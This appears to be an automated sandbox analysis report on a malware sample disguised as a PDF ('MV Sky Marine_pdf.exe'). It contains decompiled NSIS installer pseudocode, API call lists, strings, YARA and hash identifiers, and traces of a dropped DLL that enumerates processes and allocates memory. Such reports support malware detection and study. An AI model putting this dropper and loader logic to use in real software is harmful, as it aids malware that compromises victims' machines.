                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00402CA5, Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 96%
                                                                                                  			E00402CA5(void* __eflags, signed int _a4) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v300;
				long _t54;
				void* _t57;
				void* _t61;
				intOrPtr _t64;
				void* _t67;
				intOrPtr* _t69;
				intOrPtr _t70;
				long _t81;
				void* _t82;
				signed int _t88;
				intOrPtr _t91;
				void* _t99;
				signed int _t101;
				void* _t103;
				long _t104;
				long _t107;
				void* _t108;

				_v8 = 0;
				_v12 = 0;
				 *0x7a27ac = GetTickCount() + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\alfons\\Desktop\\MV Sky Marine_pdf.exe", 0x400);
				_t103 = E004059FB("C:\\Users\\alfons\\Desktop\\MV Sky Marine_pdf.exe", 0x80000000, 3);
				 *0x409014 = _t103;
				if(_t103 == 0xffffffff) {
					return "Error launching installer";
				}
				E00405D24("C:\\Users\\alfons\\Desktop", "C:\\Users\\alfons\\Desktop\\MV Sky Marine_pdf.exe");
				E00405D24(0x7aa000, E0040585E("C:\\Users\\alfons\\Desktop"));
				_t54 = GetFileSize(_t103, 0);
				 *0x79d950 = _t54;
				_t107 = _t54;
				if(_t54 <= 0) {
					L22:
					E00402C06(1);
					if( *0x7a27b4 == 0) {
						goto L30;
					}
					if(_v12 == 0) {
						L26:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t108 = _t57;
						 *0x40b088 = 0xb;
						 *0x40b0a0 = 0; // executed
						E00405A2A( &_v300, "C:\\Users\\alfons\\AppData\\Local\\Temp\\"); // executed
						_t61 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
						 *0x409018 = _t61;
						if(_t61 != 0xffffffff) {
							_t64 = E00403227( *0x7a27b4 + 0x1c);
							 *0x79d954 = _t64;
							 *0x795948 = _t64 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t67 = E00402F4E(_v16, 0xffffffff, 0, _t108, _v20); // executed
							if(_t67 == _v20) {
								 *0x7a27b0 = _t108;
								 *0x7a27b8 =  *_t108;
								if((_v40 & 0x00000001) != 0) {
									 *0x7a27bc =  *0x7a27bc + 1;
								}
								_t45 = _t108 + 0x44; // 0x44
								_t69 = _t45;
								_t99 = 8;
								do {
									_t69 = _t69 - 8;
									 *_t69 =  *_t69 + _t108;
									_t99 = _t99 - 1;
								} while (_t99 != 0);
								_t70 =  *0x795944; // 0x2dc9b
								 *((intOrPtr*)(_t108 + 0x3c)) = _t70;
								E004059BC(0x7a27c0, _t108 + 4, 0x40);
								return 0;
							}
							goto L30;
						}
						return "Error writing temporary file. Make sure your temp folder is valid.";
					}
					E00403227( *0x795940);
					if(E004031F5( &_a4, 4) == 0 || _v8 != _a4) {
						goto L30;
					} else {
						goto L26;
					}
				} else {
					do {
						_t104 = _t107;
						asm("sbb eax, eax");
						_t81 = ( ~( *0x7a27b4) & 0x00007e00) + 0x200;
						if(_t107 >= _t81) {
							_t104 = _t81;
						}
						_t82 = E004031F5(0x795950, _t104); // executed
						if(_t82 == 0) {
							E00402C06(1);
							L30:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x7a27b4 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E00402C06(0);
							}
							goto L19;
						}
						E004059BC( &_v40, 0x795950, 0x1c);
						_t88 = _v40;
						if((_t88 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
							_a4 = _a4 | _t88;
							_t101 =  *0x795940; // 0x0
							 *0x7a2840 =  *0x7a2840 | _a4 & 0x00000002;
							_t91 = _v16;
							 *0x7a27b4 = _t101;
							if(_t91 > _t107) {
								goto L30;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v12 = _v12 + 1;
								_t107 = _t91 - 4;
								if(_t104 > _t107) {
									_t104 = _t107;
								}
								goto L19;
							} else {
								goto L22;
							}
						}
						L19:
						if(_t107 <  *0x79d950) {
							_v8 = E00406123(_v8, 0x795950, _t104);
						}
						 *0x795940 =  *0x795940 + _t104;
						_t107 = _t107 - _t104;
					} while (_t107 > 0);
					goto L22;
				}
			}






























                                                                                                  0x00402cb3
                                                                                                  0x00402cb6
                                                                                                  0x00402cd0
                                                                                                  0x00402cd5
                                                                                                  0x00402ce8
                                                                                                  0x00402ced
                                                                                                  0x00402cf3
                                                                                                  0x00000000
                                                                                                  0x00402cf5
                                                                                                  0x00402d06
                                                                                                  0x00402d17
                                                                                                  0x00402d1e
                                                                                                  0x00402d26
                                                                                                  0x00402d2b
                                                                                                  0x00402d2d
                                                                                                  0x00402e1d
                                                                                                  0x00402e1f
                                                                                                  0x00402e2b
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00402e34
                                                                                                  0x00402e60
                                                                                                  0x00402e65
                                                                                                  0x00402e6b
                                                                                                  0x00402e79
                                                                                                  0x00402e80
                                                                                                  0x00402e86
                                                                                                  0x00402ea1
                                                                                                  0x00402eaa
                                                                                                  0x00402eaf
                                                                                                  0x00402ece
                                                                                                  0x00402ede
                                                                                                  0x00402ef0
                                                                                                  0x00402ef5
                                                                                                  0x00402efd
                                                                                                  0x00402f0a
                                                                                                  0x00402f12
                                                                                                  0x00402f17
                                                                                                  0x00402f19
                                                                                                  0x00402f19
                                                                                                  0x00402f21
                                                                                                  0x00402f21
                                                                                                  0x00402f24
                                                                                                  0x00402f25
                                                                                                  0x00402f25
                                                                                                  0x00402f28
                                                                                                  0x00402f2a
                                                                                                  0x00402f2a
                                                                                                  0x00402f2d
                                                                                                  0x00402f34
                                                                                                  0x00402f40
                                                                                                  0x00000000
                                                                                                  0x00402f45
                                                                                                  0x00000000
                                                                                                  0x00402efd
                                                                                                  0x00000000
                                                                                                  0x00402eb1
                                                                                                  0x00402e3c
                                                                                                  0x00402e4e
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00402d33
                                                                                                  0x00402d33
                                                                                                  0x00402d38
                                                                                                  0x00402d3c
                                                                                                  0x00402d43
                                                                                                  0x00402d4a
                                                                                                  0x00402d4c
                                                                                                  0x00402d4c
                                                                                                  0x00402d54
                                                                                                  0x00402d5b
                                                                                                  0x00402ebd
                                                                                                  0x00402eff
                                                                                                  0x00000000
                                                                                                  0x00402eff
                                                                                                  0x00402d67
                                                                                                  0x00402deb
                                                                                                  0x00402dee
                                                                                                  0x00402df3
                                                                                                  0x00000000
                                                                                                  0x00402deb
                                                                                                  0x00402d74
                                                                                                  0x00402d79
                                                                                                  0x00402d81
                                                                                                  0x00402da7
                                                                                                  0x00402dad
                                                                                                  0x00402db6
                                                                                                  0x00402dbc
                                                                                                  0x00402dc1
                                                                                                  0x00402dc7
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00402dd1
                                                                                                  0x00402dd9
                                                                                                  0x00402ddc
                                                                                                  0x00402de1
                                                                                                  0x00402de3
                                                                                                  0x00402de3
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00402dd1
                                                                                                  0x00402df4
                                                                                                  0x00402dfa
                                                                                                  0x00402e0a
                                                                                                  0x00402e0a
                                                                                                  0x00402e0d
                                                                                                  0x00402e13
                                                                                                  0x00402e15
                                                                                                  0x00000000
                                                                                                  0x00402d33

                                                                                                  APIs
                                                                                                  • GetTickCount.KERNEL32 ref: 00402CB9
                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\MV Sky Marine_pdf.exe,00000400), ref: 00402CD5
                                                                                                    • Part of subcall function 004059FB: GetFileAttributesA.KERNELBASE(00000003,00402CE8,C:\Users\user\Desktop\MV Sky Marine_pdf.exe,80000000,00000003), ref: 004059FF
                                                                                                    • Part of subcall function 004059FB: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405A21
                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,007AA000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\MV Sky Marine_pdf.exe,C:\Users\user\Desktop\MV Sky Marine_pdf.exe,80000000,00000003), ref: 00402D1E
                                                                                                  • GlobalAlloc.KERNELBASE(00000040,?), ref: 00402E65
                                                                                                  Strings
                                                                                                  • "C:\Users\user\Desktop\MV Sky Marine_pdf.exe" , xrefs: 00402CA5
                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00402CB2, 00402E73
                                                                                                  • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402EB1
                                                                                                  • soft, xrefs: 00402D95
                                                                                                  • Inst, xrefs: 00402D8C
                                                                                                  • C:\Users\user\Desktop\MV Sky Marine_pdf.exe, xrefs: 00402CBF, 00402CCE, 00402CE2, 00402CFF
                                                                                                  • Null, xrefs: 00402D9E
                                                                                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402EFF
                                                                                                  • C:\Users\user\Desktop, xrefs: 00402D00, 00402D05, 00402D0B
                                                                                                  • Error launching installer, xrefs: 00402CF5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                  • String ID: "C:\Users\user\Desktop\MV Sky Marine_pdf.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\MV Sky Marine_pdf.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                                  • API String ID: 2803837635-3842810095
                                                                                                  • Opcode ID: 7fd70c8277d5ef014cb9db5e6e74861e325fe440be814c78f72cfa94b25d12ec
                                                                                                  • Instruction ID: 4d26221675f5f87765302aeed84baf1f1304f02d467103b64e74c7d1d91a9346
                                                                                                  • Opcode Fuzzy Hash: 7fd70c8277d5ef014cb9db5e6e74861e325fe440be814c78f72cfa94b25d12ec
                                                                                                  • Instruction Fuzzy Hash: 1F71E471900215ABDB209F68DE89B9A77B8FB05324F10413BFA01B62D1D7BC9E419B9C
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00401751, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147stringtimeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 75%
                                                                                                  			E00401751(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402A29(0x31);
				 *(_t85 - 0xc) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E00405884(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E00405817(E00405D24(0x409c30, 0x7a8800)), ??);
				} else {
					_push(0x409c30);
					E00405D24();
				}
				E00405F86(0x409c30);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E0040601F(0x409c30);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E004059DC(0x409c30);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E004059FB(0x409c30, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 8) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00405010(0xffffffe2,  *(_t85 - 0xc));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x7a2828 =  *0x7a2828 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x7a2828;
						goto L32;
					} else {
						E00405D24(0x40a430, 0x7a3000);
						E00405D24(0x7a3000, 0x409c30);
						E00405D46(_t75, 0x40a430, 0x409c30, "C:\Users\alfons\AppData\Local\Temp\nssBDFE.tmp\lckp0.dll",  *((intOrPtr*)(_t85 - 0x14)));
						E00405D24(0x7a3000, 0x40a430);
						_t62 = E004055E5("C:\Users\alfons\AppData\Local\Temp\nssBDFE.tmp\lckp0.dll",  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x7a2828 =  &( *0x7a2828->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409c30);
								_push(0xfffffffa);
								E00405010();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00405010(0xffffffea,  *(_t85 - 0xc));
				 *0x7a2854 =  *0x7a2854 + 1;
				_t43 = E00402F4E(_t77,  *((intOrPtr*)(_t85 - 0x20)),  *(_t85 - 8), _t75, _t75); // executed
				 *0x7a2854 =  *0x7a2854 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 8), _t85 - 0x1c, _t75, _t85 - 0x1c);
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 8)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405D46(_t75, _t80, 0x409c30, 0x409c30, 0xffffffee);
					} else {
						E00405D46(_t75, _t80, 0x409c30, 0x409c30, 0xffffffe9);
						lstrcatA(0x409c30,  *(_t85 - 0xc));
					}
					_push(0x200010);
					_push(0x409c30);
					E004055E5();
					goto L29;
				}
				goto L33;
			}
















                                                                                                  0x00401751
                                                                                                  0x00401758
                                                                                                  0x00401761
                                                                                                  0x00401764
                                                                                                  0x00401767
                                                                                                  0x0040176c
                                                                                                  0x00401774
                                                                                                  0x00401790
                                                                                                  0x00401776
                                                                                                  0x00401776
                                                                                                  0x00401777
                                                                                                  0x00401777
                                                                                                  0x00401796
                                                                                                  0x004017a0
                                                                                                  0x004017a0
                                                                                                  0x004017a4
                                                                                                  0x004017a7
                                                                                                  0x004017ac
                                                                                                  0x004017ae
                                                                                                  0x004017b0
                                                                                                  0x004017b5
                                                                                                  0x004017b5
                                                                                                  0x004017c0
                                                                                                  0x004017c0
                                                                                                  0x004017d1
                                                                                                  0x004017d3
                                                                                                  0x004017d3
                                                                                                  0x004017d4
                                                                                                  0x004017d4
                                                                                                  0x004017d7
                                                                                                  0x004017da
                                                                                                  0x004017dd
                                                                                                  0x004017dd
                                                                                                  0x004017e4
                                                                                                  0x004017f3
                                                                                                  0x004017f8
                                                                                                  0x004017fb
                                                                                                  0x004017fe
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00401800
                                                                                                  0x00401803
                                                                                                  0x0040185d
                                                                                                  0x00401862
                                                                                                  0x004015a8
                                                                                                  0x0040268f
                                                                                                  0x0040268f
                                                                                                  0x004028be
                                                                                                  0x004028c1
                                                                                                  0x004028c1
                                                                                                  0x00000000
                                                                                                  0x00401805
                                                                                                  0x0040180b
                                                                                                  0x00401816
                                                                                                  0x00401823
                                                                                                  0x0040182e
                                                                                                  0x00401844
                                                                                                  0x00401844
                                                                                                  0x00401847
                                                                                                  0x00000000
                                                                                                  0x0040184d
                                                                                                  0x0040184d
                                                                                                  0x0040184e
                                                                                                  0x0040186b
                                                                                                  0x004028c7
                                                                                                  0x004028c7
                                                                                                  0x004028c7
                                                                                                  0x00401850
                                                                                                  0x00401850
                                                                                                  0x00401851
                                                                                                  0x00401492
                                                                                                  0x00402241
                                                                                                  0x00402241
                                                                                                  0x00402241
                                                                                                  0x0040184e
                                                                                                  0x00401847
                                                                                                  0x004028c9
                                                                                                  0x004028cd
                                                                                                  0x004028cd
                                                                                                  0x0040187b
                                                                                                  0x00401880
                                                                                                  0x0040188e
                                                                                                  0x00401893
                                                                                                  0x00401899
                                                                                                  0x0040189d
                                                                                                  0x0040189f
                                                                                                  0x004018a7
                                                                                                  0x004018b3
                                                                                                  0x004018a1
                                                                                                  0x004018a1
                                                                                                  0x004018a5
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x004018a5
                                                                                                  0x004018bc
                                                                                                  0x004018c2
                                                                                                  0x004018c4
                                                                                                  0x00000000
                                                                                                  0x004018ca
                                                                                                  0x004018ca
                                                                                                  0x004018cd
                                                                                                  0x004018e5
                                                                                                  0x004018cf
                                                                                                  0x004018d2
                                                                                                  0x004018db
                                                                                                  0x004018db
                                                                                                  0x004018ea
                                                                                                  0x004018ef
                                                                                                  0x0040223c
                                                                                                  0x00000000
                                                                                                  0x0040223c
                                                                                                  0x00000000

                                                                                                  APIs
                                                                                                  • lstrcatA.KERNEL32(00000000,00000000,HfkcdoekxlzOjbt,007A8800,00000000,00000000,00000031), ref: 00401790
                                                                                                  • CompareFileTime.KERNEL32(-00000014,?,HfkcdoekxlzOjbt,HfkcdoekxlzOjbt,00000000,00000000,HfkcdoekxlzOjbt,007A8800,00000000,00000000,00000031), ref: 004017BA
                                                                                                    • Part of subcall function 00405D24: lstrcpynA.KERNEL32(?,?,00000400,0040331D,007A1FA0,NSIS Error), ref: 00405D31
                                                                                                    • Part of subcall function 00405010: lstrlenA.KERNEL32(0079E578,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C7D,00000000,?), ref: 00405049
                                                                                                    • Part of subcall function 00405010: lstrlenA.KERNEL32(00402C7D,0079E578,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C7D,00000000), ref: 00405059
                                                                                                    • Part of subcall function 00405010: lstrcatA.KERNEL32(0079E578,00402C7D,00402C7D,0079E578,00000000,00000000,00000000), ref: 0040506C
                                                                                                    • Part of subcall function 00405010: SetWindowTextA.USER32(0079E578,0079E578), ref: 0040507E
                                                                                                    • Part of subcall function 00405010: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004050A4
                                                                                                    • Part of subcall function 00405010: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004050BE
                                                                                                    • Part of subcall function 00405010: SendMessageA.USER32(?,00001013,?,00000000), ref: 004050CC
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nssBDFE.tmp$C:\Users\user\AppData\Local\Temp\nssBDFE.tmp\lckp0.dll$HfkcdoekxlzOjbt
                                                                                                  • API String ID: 1941528284-1124299726
                                                                                                  • Opcode ID: 3ed75d5ec2aaaa4dda51dd868a496994b7c7c47cfda75710b456c16e46bfc254
                                                                                                  • Instruction ID: bcf89e71c0b84c1643d0e5dd4294d147bdc57561e776f7a63a755c298ef41478
                                                                                                  • Opcode Fuzzy Hash: 3ed75d5ec2aaaa4dda51dd868a496994b7c7c47cfda75710b456c16e46bfc254
                                                                                                  • Instruction Fuzzy Hash: A841B672910515BBCF107FA5CC49DAF76A9DF46368B20823BF421F50E1D63C8A419A6D
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 004054D2, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 39COMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 100%
                                                                                                  			E004054D2(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x40735c;
				_v36.Group = 0x40735c;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x40734c;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                                                                                                  0x004054dd
                                                                                                  0x004054e1
                                                                                                  0x004054e4
                                                                                                  0x004054ea
                                                                                                  0x004054ee
                                                                                                  0x004054f2
                                                                                                  0x004054fa
                                                                                                  0x00405501
                                                                                                  0x00405507
                                                                                                  0x0040550e
                                                                                                  0x00405515
                                                                                                  0x0040551d
                                                                                                  0x0040551f
                                                                                                  0x00000000
                                                                                                  0x0040551f
                                                                                                  0x00405529
                                                                                                  0x00405530
                                                                                                  0x00405546
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00405548
                                                                                                  0x0040554c

                                                                                                  APIs
                                                                                                  • CreateDirectoryA.KERNELBASE(?,?,00000000), ref: 00405515
                                                                                                  • GetLastError.KERNEL32 ref: 00405529
                                                                                                  • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 0040553E
                                                                                                  • GetLastError.KERNEL32 ref: 00405548
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                  • String ID: C:\Users\user\Desktop$Ls@$\s@
                                                                                                  • API String ID: 3449924974-776639217
                                                                                                  • Opcode ID: 31ad9693580a8955374231099f971d3d62770966da1912963915dd7ffeca80d6
                                                                                                  • Instruction ID: 8051479f1b7dfbdff81470336266ace25075fbacda9c2120679e06572a60611e
                                                                                                  • Opcode Fuzzy Hash: 31ad9693580a8955374231099f971d3d62770966da1912963915dd7ffeca80d6
                                                                                                  • Instruction Fuzzy Hash: B7010871D04219EAEF019BA0DD047EFBFB9EF04358F008136D905B6190D378A604CFAA
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 10003118, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 286filememoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 10004347: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,034CF0BF,873D1860,034CF0BF,5C7BF6E9,034CF0BF,EA31D3B6), ref: 1000438C
                                                                                                  • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 10004650
                                                                                                    • Part of subcall function 10004347: Process32FirstW.KERNEL32(000000FF,0000022C), ref: 100043B0
                                                                                                  • VirtualAlloc.KERNELBASE(00000000,000000FF,00003000,00000004), ref: 10004683
                                                                                                    • Part of subcall function 10004347: Process32NextW.KERNEL32(000000FF,0000022C,?), ref: 100043DB
                                                                                                  • ReadFile.KERNELBASE(000000FF,00000000,000000FF,00000000,00000000), ref: 100046A3
                                                                                                  • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 10004722
                                                                                                  • ExitProcess.KERNEL32(00000000,00000000,00000000,eefabbdd2d91492f84a447c9784d4f08,00000020,00000000,00000000,00000000), ref: 100047B1
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.235472130.0000000010003000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.235453419.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.235460951.0000000010001000.00000020.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.235467539.0000000010002000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.235488746.0000000010005000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: AllocCreateFileProcess32Virtual$ExitFirstNextProcessReadSnapshotToolhelp32
                                                                                                  • String ID: eefabbdd2d91492f84a447c9784d4f08
                                                                                                  • API String ID: 3683539093-2742424023
                                                                                                  • Opcode ID: fda209e7b4fa27b05ffb3c82032ba5aa4b075fea44580e8131726da5a0d44328
                                                                                                  • Instruction ID: 3a7903ee8559d346e032095aa3da00bd5eaae24efd5f37b303c251154b6b1a8a
                                                                                                  • Opcode Fuzzy Hash: fda209e7b4fa27b05ffb3c82032ba5aa4b075fea44580e8131726da5a0d44328
                                                                                                  • Instruction Fuzzy Hash: 24C17970D04388EEEF11CBE4DC46BEDBBB5EF05744F114099E604BA292DBB55A44CB29
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 10003831, Relevance: 10.7, APIs: 7, Instructions: 237fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 10003933
                                                                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 10003B00
                                                                                                  Memory Dump Source
